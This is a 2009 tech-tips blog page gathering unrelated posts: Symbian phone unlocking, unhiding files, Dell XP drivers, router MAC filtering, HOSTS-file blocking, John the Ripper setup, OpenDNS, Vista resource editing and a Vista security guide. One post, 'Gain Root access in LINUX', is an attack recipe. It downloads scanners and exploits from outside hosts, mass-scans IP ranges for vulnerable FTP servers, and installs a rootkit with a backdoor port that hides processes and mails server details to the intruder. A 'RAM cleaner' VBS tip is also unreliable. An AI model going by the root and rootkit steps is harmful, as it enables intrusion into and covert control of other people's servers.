Saturday, October 31, 2009


Friday, October 16, 2009

How to hack series 60 mobile and install n-gage application (tested for Eseries (E63 , E71) mobiles)

Hacking the Symbian phone (series 60 v3 and v5 mobile) :-


               Obtaining your certificate:
  The following URLs can be used to get your certificate generated
      (i) http://cer.opda.cn/en/index.php?module=index&action=
     (ii) http://allnokia.ru/symb_cert/
    (iii) http://isign.imobile.com.cn
        
   Here I will explain how to get your certificate from (i) http://cer.opda.cn .
1. Go to http://cer.opda.cn/en/index.php?module=index&action=
2. Click on "Register" at the upper right corner.
   Fill in the Account (username), Password, Confirm Password, Email and Code. You get registered immediately.
3. Login with your username and password. Click on "Apply Cer" (see Pic 1)





4. Fill in the details (see Pic 2). Click on "Apply"



5. Once applied, it will show the status as "Applying" (Pic 3).




6. Now wait for (8-48) hours and login. Click on "My Certificate". If it is generated, the status shows "Normal" (see Pic 4)



7. Now download the certificate (.cer) and save it as "My Certificate.cer" (You will have to change the extension to .cer)
8. Similarly download the key (.key) file and save it as "Certificate.key" (You will have to change the extension to .key)


  Signing the hacking tool with your certificate and key:
1. Copy the folder "Tools" to your desktop.
   (Please do not skip this because then you will have to redownload the file if anything goes wrong).
2. Open Tools and double click "Copier.bat" to copy files to your Windows directory else nothing will work.
   Now double click "Signer.exe".
3. In "Select SIS file", browse to Desktop/Tools/HelloOX2.sis
4. In "Select Certificate file", select the .cer file you got in the previous column.
5. In "Selct Key file", select the .key file you got in the previous column.
6. Leave "Key File Password" blank. Now click on "Sign!"

Now Desktop/Tools/HelloOX2.sis is signed and can be used to hack your phone. Install HelloOX2 to your phone.


  Using the HelloOX on Phone:
1. Once installed (disconnect it from USB if you used PCSuite to install), go to application menu and open HelloOX (bull).
2. It will automatically start to:
  (i) Map drive
 (ii) Unpack Hacking files to the virtual drive
(iii) Activate file system
 (iv) Unmap drive
  (v) Install root certificate (takes some time at "installing root certificate", give it some time.)
 (vi) Install RomPatcher+
(vii) Optional Install Modo (select yes when it aks to install it)

Wednesday, July 8, 2009

how to see and recover hidden folder or files

1. click start>>run>>type in "cmd"
2. type the location of your flash drive.. e.g. "d:", "e:", "f:", etc..
3. type "dir /ah"
*you will now see the files/folders with hidden attributes
4. type "attrib [name of file/folder] -r -a -s -h"
*if you're going to unhide files, you should type the whole name plus the extension (format).. example "attrib party.jpg -r -a -s -h"
**if you have folders with 6 characters and above, type the first 6 characters then "~1".. example for folder named "birthday"
"attrib birthd~1 -r -a -s -h"
5. you should repeatedly type dir /ah after unhiding some files/folders so you'll know if they're now working or not..
6. now check you flash drive.. it should be there..

Dell XPS M1530 Laptop-Download Vista to Windows XP Drivers

Drivers for Dell XPS M1530 Laptop - Free Drivers for Windows XP
Download Windows XP drivers for Graphics, Bluetooth, LAN, Launch buttons, touchpad, audio, camera etc. Complete package to downgrade from Vista to XP. Windows XP is faster and more user friendly than Vista. If you want Windows XP back on your machine, download these drivers to run your laptop smoothly on XP.

Dell XPS M1530 Laptop
Vista to Windows XP Drivers for Dell XPS M1530 Laptop
Dell XPS M1530
Driver Installation Package
Windows XP (SP2 recommended)
Instructions
——————————–
1. AHCI SATA support (IMPORTANT!)
Installation technique:
First step is to turn off SATA AHCI mode in BIOS (you’ll switch it from AHCI to ATA). Search through BIOS until you find it. It will advise that you have to disable “Flash Cache” first, do this, and then set SATA mode to ATA instead of AHCI. Then, save your settings, reboot and install XP as usual. Once XP is installed, install the AHCI driver yourself via the file in the folder /AHCI. After this has been done successfully, you can go back into the BIOS and re-enable SATA AHCI mode and Flash Cache.
Instruction:
Please install the driver in sequence below. Most drivers will require installation through Windows Device Manager’s “Have Disk” method (indicate it to the INF in the appropriate driver’s folder).
1. Chipset (1.1.15.0) compulsory
2. Audio (5.10.5210.0) compulsory
3. Video (174.31, DELL) compulsory
4. Card Reader (6.00.01.05) 3 separate drivers compulsory
5. Ethernet (10.60.6.3) compulsory
6. Touchpad (7.1.102.7, DELL) compulsory
7. Fingerprint Reader (1.9.2.0111) compulsory
8. Wireless (11.5.1.15) compulsory
9. Bluetooth (6.1.0.300, 5.0.1.2609, DELL) optional
10. Webcam (2.0, DELL) optional
11. Quickset (8.3.11, DELL) optional
12. Winamp Plugin (1.0) optional
If you install all the mandatory drivers that will left you with no “unknown devices” in Device Manager. Note that for the winamp plugin, you can place it in your /Winamp/Plugins folder to allow the M1530’s media controls (as well as the remote control) to work in Winamp. Also note that quickset isn’t necessary for the special keyboard and media control functions to work (eg. brightness/volume controls), all it does is provide the on-screen display. I didn’t install it.
Quick Install:
1. Start
2. Run and type “location of file” -s
so in my case it is c:\1530drivers\Quickset\setup.exe -s
Driver for Windows XP - Dell XPS M1530 Intel Chipset Utility
Size: 2 MB
Description: Windows XP - Intel Mobile Chipset Utility Driver
Download: Intel-Mobile-Chipset.zip
Driver for Windows XP - Dell XPS M1530 AHCI Sata RAID Controller
Size: 4.68 MB
Description: Windows XP - Intel AHCI SATA RAID Controller Storage Manager Driver
Download: AHCI.zip
Driver for Windows XP - Dell XPS M1530 Sigmatel Audio
Size: 7.87 MB
Description: Windows XP - SIGMATEL STAC 92XX C-Major HD Audio Driver
Download: Audio.zip
Driver for Windows XP - Dell XPS M1530 Card Reader,Lan Card,Touchpad,FingerPrint Reader
Size: 3.96 MB
Description: Windows XP - Ricoh R5C833 Card Reader, Marvell Lan Card, Finger Print Reader, Touchpad Driver
Download: LanCard-CardReader-Touchpad-FingerPrint.zip
Driver for Windows XP - Dell XPS M1530 Conexant Modem
Size: 1 MB
Description: Windows XP - Conexant D400 External USB Modem Driver
Download: CONEXANT_D400-EXTERNAL-USB-5_A04_R197197.EXE
Driver for Windows XP - Dell XPS M1530 Creative Labs Webcam
Size: 6 MB
Description: Windows XP - Creative Labs Laptop Integrated Webcam Driver
Download: Creative.exe
Driver for Windows XP - Dell XPS M1530 Dell Wireless WLAN
Size: 89 MB
Description: Windows XP - Dell Wireless 1395/1490/1390/1505 Wifi WLAN Driver
Download: Dell_multi-device_A17_R174291.exe
Driver for Windows XP - Dell XPS M1530 Intel Wireless WLAN
Size: 4.74 MB
Description: Windows XP - Intel PRO/Wireless 3945ABG Wifi WLAN Driver
Download: Intel_WLAN.zip
Driver for Windows XP - Dell XPS M1530 Bluetooth
Size: 34.23 MB
Description: Windows XP - Dell Wireless 355 Bluetooth Module (Bluetooth 2.0 + EDR) Driver
Download: Bluetooth.zip
Driver for Windows XP - Dell XPS M1530 Nvidia Graphics Display
Size: 58 MB
Description: Windows XP - Nvidia 8400M 8600M VGA Graphics Display Driver
Download: Nvidia-8400M-8600M-XP.zip

Sunday, July 5, 2009

Clean your RAM by notepad

Clean Yer RAM & Make Your Comp Speed Better
credit goes to sid for sharing this trick with us


Clean Ur RAM
U may recognize that ur system gets slower and slower when playing and working a lot with ur pc. That's cause ur RAM is full of remaining progress pieces u do not need any more.

So create a new text file on ur desktop and call it .. uhm.. "RAMcleaner" or something...

Type

FreeMem=Space(64000000)
in this file and save it as RAMcleaner.vbs [ You may choose the "All Files" option when u save it ]

Run the file and ur RAM may be cleaned :>
Of course u can edit the code in the file for a greater "cleaning-progress".


FreeMem=Space(1280000000)

Saturday, July 4, 2009

How to configure UTStarcom wireless router WA3002G4 | WLAN security with MAC address filtering






Following snapshots will explain "How to configure BSNL Broadband wireless router/modem with added security". And how to stop others accessing your wireless connection. First step 1-9 will be taught about basic configuration of router with Ethernet adapter. Step 10-12 will help you to configure for wireless router. In Step 13-15 you will learn how to prevent wireless usage theft at home by using MAC address filter in router.


Usually BSNl supplies comparatively cheaper UTStar router even though linksys,Netgear,D-Link etc available for low price with good deals in the market. This router can be bought for cash or hired/rent on monthly basis which will be included in your monthly bill.

I am a BSNL broadband user and using wireless for my home for quite sometime., Initially technician from telephone exchange configured wireless router for my computer with default settings.

As days gone by, I had curiosity to configure my router to be more secured so that no one can access my wireless modem except me. One such security tips are IP address filtering,MAC address filtering,Network authentication(WPA/WEP code) like WPA-PSK. I will show you how to use some these wireless security in your router configuration.

Step:1 (configure router for Ethernet cable)




Step:2



Step:3 (click edit)



Step:4



Step:5



Step:6 (Type dataone username and password)



Step:7



Step:8



Step:9



Once you click save/reboot wait for sometime. your current DSL router browser gets refreshed. Don't browse anything or switch on/off your router. It automatically once configuration gets updated in your router hardware.

In the following steps, you will learn about how to configure wireless router

Step:10



Step:11



Step:12



This ends the wireless router configuration.

The following steps will explain you how to add mac filtering address to your router to prevent others using your wireless router.

Step:13

Go to start ->Run->cmd(command window)->type ipconfig/all->enter

See below screen, after executing command you will see screen something look this with your wi fi adapter card physical address and other specifications.



Step:14 (click on mac filter in left pane, then click allow radio button followed by add just type in mac address like this

00:1A:73:XX:XX:XX (12 DIGIT ALPHA NUMERIC)

You will get error if you feed like this

XX-XX-XX-XX-XX-XX

XX.XX.XX.XX.XX.XX

BOTH ARE WRONG, TO CONFIRM LOOK BACK AT THE ROUTER(instrument)FOR MAC ADDRESS FORMAT



Step:15



close the DSL configuration browser and now establish wireless connection with your router

connect your wireless connection



Finally once your done, go to your computer/laptop you can see wireless computer icon at the taskbar, right click on it then say view wireless connection you will get above screen..

Then you can see the DSL wireless service provider with name what you configured in the above steps, just click on that and feed in network key (step 11) what you have given before then just say connect. soon you will established wireless network connection with your router.

Sunday, May 3, 2009

How to Block Websites ?

Some times it becomes necessary to block a few websites on our Computers for one or other reason.You can easily and effectivily block access to a website by adding it to your Windows HOSTS file.

1.Go to your HOSTS file which is located at:

C:\WINDOWS\SYSTEM32\DRIVERS\ETC for Vista and XP
C:\WINNT\SYSTEM32\DRIVERS\ETC for Win 2000
C:\WINDOWS for Windows 98 and ME

2. Open HOSTS with Notepad.

The default Windows HOSTS looks like this:
______________________

# Copyright © 1993-1999 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a “#” symbol.
#
# For example:
#
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host
#
127.0.0.1 localhost
_____________________________

3. Directly under the line that says 127.0.0.1 Localhost, you will want to type:

127.0.0.1 name of the URL you want to block

For example to block the MySpace.com homepage (highly recommended!), simply type:

127.0.0.1 myspace.com
127.0.0.1 www.myspace.com

Other parts of MySpace could be blocked in a similar way:

127.0.0.1 search.myspace.com
127.0.0.1 profile.myspace.com
etc etc etc…

You may need to add sites with both with and without the “www.”. Test after blocking to make sure you got it right.

You can add as many sites as you wish to block in this fashion. I, myself, have over 12000 undesireable and dangerous sites in my personal HOSTS file!

4. Close Notepad and answer “Yes” when prompted.

5. Reboot your computer and attempt to access your now blocked website. You should see a Cannot find server or DNS Error saying: “The page cannot be displayed”.

—————————–

Some people suggest that you add a website that you wish to block by adding it to Internet Explorer’s Restricted Zone. This does NOT totally block a site. It will only RESTRICT a site from certain actions such as using javascript, Active-X and Java etc.

Some people suggest that your add a website to the Internet Explorer ‘Privacy’ settings. This does not block a site. It only stops that site from using cookies.

Password cracker - John the Ripper Installation

Download a source code

Installation can begin by downloading a source code of John the Ripper password cracker. Once we know the link of a file we can use wget:

install_johnripper01.jpg

Extract source files

tar xvzf john-1.7.0.2.tar.gz

Compile a source file

Navigate to:

cd john-1.7.0.2/src

Then we need to rum make command which will return a list of available systems that John the Ripper password cracker can be compiled on.

make

Choose your appropriate architecture, and compile

make linux-x86-any

john the ripper binary

cd ../run/ ls ./john
install_johnripper02.jpg

Hack BSNL Broadband for Speed

If you are a BSNL broadband user, chances are that you are facing frequent DNS issues. Their DNS servers are just unresponsive. The look up takes a long duration and many times just time out. The solution? There is small hack on BSNL for this. Use third party DNS servers instead of BSNL DNS servers or run your own one likedjbdns. The easiest options is to useOpenDNS. Just reconfigure your network to use the following DNS servers:

208.67.222.222
208.67.220.220

Detailed instructions specific to operating system or your BSNL modem are available in the OpenDNS website itself. After I reconfigured my BSNL modem to use the above 2 IP addresses, my DNS problems just vanished! Other ‘freebies’ that come with OpenDNS are phishing filters and automatic URL correction. Even if your service provider’s DNS servers are working fine, you can still use OpenDNS just for these two special features.After you hack BSNL DNS servers, you will see a noticeable improvement in your broadband speed.

Gain Root access in LINUX

First you need a shell witch you will scan for other shells/roots with this scanner: wget http://dalnet.bumerang.ro/linux/xpl/wu2.tar.gz after you download it, start scaning: tar -xzvf wu2.tar.gz unpacking the arhive cd alpyftpd/ ./scan 203 21 180 203 - first IP class 21 - its necesary, its the FTP port, the exploit its for FTP 180 - second IP class wew  rootkit: its a backdoor witch lets you connect to the server throught another port and pass set by you.that makes you invisible, hides screen, ps, w, last and all your procces. wget http://dalnet.bumerang.ro/linux/rk/X.tar.gz tar -xzvf X.tar.gz unpacking the arhive cd X/ ./install root password port e-mail root - its necesary, its the ID password - its set the password you want for root port - the port you connect through on ssh e-mail - your mail to recive the information about the server and your options Example: ./install root dexter 1402 dextervaneza@yahoo.com that means you connect to server on port 1402 with id root and password   ATENTION ::. untuk xpost scanner : liad di bawah ini : wget http://www.cyberborneo.com/tools/xpost.tgz tar -zxvf xpost.tgz cd xpost cd xwurm ./scan 200.152 When scan finished type ./masswu wu-scan.log And if another IP SAY SECCUES u HAVE ROOT ON THIS IP... u must to connect on it with awu if u don't have awu then get it   wget www.geocities.com/blackhat12001/dimi.tgz tar -zxvf dimi.tgz cd awu ./wu -a -d IP ( or box so sayed Succes)   when he coonnect on box type: cd /dev mkdir .p cd .p wget www.geocities.com/blackhat12001/r00tk1t.tgz tar -zxvf r00tk1t.tgz cd shv4 ./setup [password] [port] port mematikan : 53

List of Windows Vista System Files to be Hacked using Resource Hacker


In this tutorial, I’ll tell about various system files in Windows Vista, which can be hacked using Resource Hacker / Resource Tuner to change the look of Windows dialog boxes, menus, login screen, boot screen and many other things.

Of course, now you guys can use Vista Visual Master to do most of these jobs.

So here we start the tutorial:

Approx. all Windows Vista system icons -> %windir%\System32\imageres.dll

Login Screen Background -> %windir%\System32\imageres.dll

Startup ORB animation images -> %windir%\System32\authui.dll

Startup ORB Sound -> %windir%\System32\imageres.dll

Shutdown/ lock, etc. buttons in Startmenu -> %windir%\Explorer.exe -> Bitmap -> 7051 - 7056

Windows Version Image in About Windows dialog box -> %windir%\Branding\Basebrd\basebrd.dll

Windows Version Image in Login Screen bottom -> %windir%\Branding\Basebrd\basebrd.dll

Classic Start button flag and Classic Start menu left side image -> %windir%\Branding\Shellbrd\shellbrd.dll

Control Panerl Left Sidebar Bottom Image -> %windir%\System32\Shell32.dll -> Bitmap -> 632

Back & Forward, Search, Stop, Refresh buttons in Windows Explorer -> %windir%\System32\browseui.dll

Back & Forward, Search, Stop, Refresh, Progress animation, tabs, tab close, etc. buttons in Internet Explorer -> %windir%\System32\ieframe.dll

Welcome Center Images -> %windir%\System32\oobefldr.dll

Boot Screen background image in “No GUI boot” condition -> %windir%\System32\en-US\Winload.exe.mui

Windows Media Player Resources -> %windir%\System32\wmploc.dll

Above are the new system files/locations in Windows Vista which were not present in earlier versions, like XP. But if you want to change look of various dialog boxes like RUN, Progress, System Properies, Startmenu and Taskbar Properties, etc. Then you’ll have to edit the same system files which you used to edit in Windows XP. The difference is, now those files dont contain the resources but their .MUI files do.

So if you want to edit RUN dialog box which was present in “%windir%\System32\Shell32.dll” file in XP, is now present in “%windir%\System32\en-US\Shell32.dll.mui” file in Windows Vista.

So in following list, I’ll tell you where all those files are present in Windows Vista:

All those files are present in any of following 2 locations:

%windir%\en-US\
%windir%\System32\en-US\

All those file names and resource locations are same in XP and Vista.
I hope you guys will like it.

How to secure your Vista PC in 10 easy steps


While Windows Vista may be Microsoft Corp.’s most secure operating system ever, it’s far from completely secure. In its fresh-from-the-box configuration, Vista still leaves a chance for your personal data to leak out to the Web through Windows Firewall or for some nefarious bot to tweak your browser settings without your knowledge.

But by making a few judicious changes using the security tools within Windows Vista — and in some cases by adding a few pieces of free software — you can lock down your operating system like a pro.

1. Use Windows Security Center as a starting point

For a quick overview of your security settings, the Windows Security Center is where you’ll find the status of your system firewall, auto update, malware protection and other security settings. Click Start, Control Panel, Security Center, or you can simply click the shield icon in the task tray. If you see any red or yellow, you are not fully protected.

For example, if you have not yet installed an antivirus product on your machine, or if your current antivirus product is out of date, the malware section of the Security Center should be yellow. Windows does not offer a built-in antivirus utility, so you’ll want to install your own. For free antivirus, I recommend AVG Anti-Virus 8.

2. Use Windows Defender as a diagnostic tool

The malware section of Windows Vista also protects against spyware using Windows Defender. The antispyware protection in your antivirus program usually trumps the protection Microsoft provides, but there are several good reasons to keep Windows Defender enabled. One is that every antispyware program uses a different definition of what is and is not spyware, so redundant protection can actually offer some benefit.

Another reason to keep Windows Defender enabled: diagnostics. Click Tools, and choose Software Explorer from the resulting pane. You can display lists of applications from several categories such as Currently Running Programs, Network Connected Programs and Winsock Service Providers, but Start-up Programs is perhaps the most useful. Click on any name in the left window, and full details will appear in the right pane. By highlighting, you can remove, disable or enable any of the programs listed.

3. Disable the start-up menu

Windows Vista keeps track of all the documents and programs you launch in the start-up menu. This can be convenient for some users, but it can also compromise your privacy if you share a computer within an office or household. Fortunately, Windows Vista provides an easy way to tweak this setting. To protect your privacy, follow these steps:

  • Right-click on the task bar and select “Properties.”
  • Click on the Start Menu tab.
  • Uncheck “Store and display a list of recently opened files.”
  • Uncheck “Store and display a list of recently opened programs.”
  • Click “OK.”

4. Get two-way firewall protection

No desktop should be without a personal firewall, but even if the Security Center says you’re protected, you may not be. The Windows Firewall within Vista blocks all incoming traffic that might be malicious or suspicious — and that’s good. But outbound protection is not enabled by default. That’s a dangerous situation if some new malicious software finds its way onto your PC.

Microsoft did include the tools for Windows Vista to have a true two-way firewall, but finding the setting is a little complicated. (Hint: Don’t go looking the Windows Firewall settings dialog box.

To get two-way firewall protection in Windows Vista, do the following:

  • Click on the Start button; in the search space, type “wf.msc” and press Enter.
  • Click on the Windows Firewall with Advanced Security icon. This management interface displays the inbound and outbound rules.
  • Click on Windows Firewalls Properties. You should now see a dialog box with several tabs.
  • For each profile — Domain, Private and Public — change the setting to Block, and then click OK.

Even if you do this tweak, I recommend adding a more robust third-party firewall. I suggest either Comodo Firewall Pro or ZoneAlarm, both of which are free and fare very well in independent firewall testing.

5. Lock out unwanted guests

If you share your computer with others — and even if you don’t — Windows Vista includes a neat way to keep unwanted guests from guessing your systems administrator password. When you set up users and declare one user as administrator with full privileges, Windows Vista allows outsiders unlimited guesses at the password you chose. Here’s how to limit the guesses.

  • Click Start, then type “Local Security Policy.”
  • Click Account Lockout Policy.
  • Choose Account Lockout Threshold.
  • At the prompt, enter the number of invalid log-ins you’ll accept (say, three).
  • Click OK and close.

6. Now audit your attackers

With the Account Lockout policy in place, you can now enable auditing to see any account attacks. To turn on auditing for failed log-on events, do the following:

  • Click the Start button, type “secpol.msc,” and click the secpol icon.
  • Click on Local Policies and then Audit Policy.
  • Right-click on “Audit account log-on events policy,” and select Properties.
  • Check the Failure box, and click OK.
  • Right-click on “Audit log-on events policy” and select Properties.
  • Check the Failure box and click OK.
  • Close the Local Security Policy window.

You can then use the Event Viewer (by running eventvwr.msc) to view the logs under Windows Logs and Security.

7. Secure your Internet Explorer settings

The Windows Security Center will also report whether your Internet Explorer 7 (or IE 8) security settings are at their recommended levels. If the screen shows this section as red, you can adjust the settings within the browser itself.

  • Within Internet Explorer, click Tools in the menu bar.
  • From the drop-down menu, click Internet Options.
  • Choose the Security tab.
  • Within the Security tab, click Custom Level.

Here you’ll see a window with all the security options for the browser. If any are below the recommended level (if, say, some malware reconfigured your browser settings), these options will be highlighted in red.

To change an individual setting, click the appropriate radio button. To reset them all, use the button near the bottom of the tab. You can also change the overall security setting for Internet Explorer from the default Medium-High setting to the recommended High or Medium, if you wish. Click OK to save and close.

8. Use OpenDNS

Domain Name System (DNS) servers act as a phone book. When you type “pcworld.com” in the address bar, for instance, your browser sends that common-name request to your Internet service provider’s DNS servers to be converted into a series of numbers, or an IP address.

Lately, DNS servers have come under attack, with criminals seeking to redirect common DNS preferences to servers that they control. One way to stop such abuse is to use OpenDNS.

Go to Start, Control Panel, Network and Internet, and then click Network and Sharing Center. Under the tasks listed on the left, click Manage Network Connections. In the Manage Network Connections window, do the following:

  • Right-click on the icon representing your network card.
  • Click Properties.
  • Click Internet Protocol Version 4.
  • Click the Properties button.
  • Select the Use the following DNS server addresses radio button.
  • Type in a primary address of 208.67.222.222.
  • Type in a secondary address of 208.67.220.220.
  • Click OK.

9. Live with User Account Control

One area where some people might want to see the Windows Security Center turn red is User Account Control (UAC), perhaps the most controversial security feature within Windows Vista. Designed to keep rogue remote software from automatically installing (among other things), UAC has a tendency to thwart legitimate software installations by interrupting the process several times with useless messages.

In Windows 7, you’ll be able to set UAC to the level you want. Until then, you do have some options. One is to disable UAC. I would caution against that, since UAC is meant to warn you of potential danger.

Instead, install TweakUAC, a free utility that enables you to turn UAC on or off as well as provides an intermediate “quiet” mode that keeps UAC on but suppresses administration-elevation prompts. With TweakUAC in quiet mode, UAC will appear to be off to those running as administrator accounts, while people with standard user accounts will still be prompted.

10. Check your work

Now that you’ve tweaked Windows Vista, you can keep tabs on your system’s security with the System Health Report. This diagnostic tool takes input from the Performance and Reliability Monitor and turns it into an information-packed report that can spotlight potential security problems.

  • Open Control Panel.
  • Click System.
  • In the Tasks list, click Performance (near the bottom).
  • In the resulting Tasks list, click Advanced tools (near the top).
  • Click the last item on the resulting list — “Generate a system health report.”

The report will list any missing drivers that might be causing error codes, tell you whether your antivirus protection is installed and declare whether UAC is turned on. You may want to run this report once a month just to make sure everything’s still good.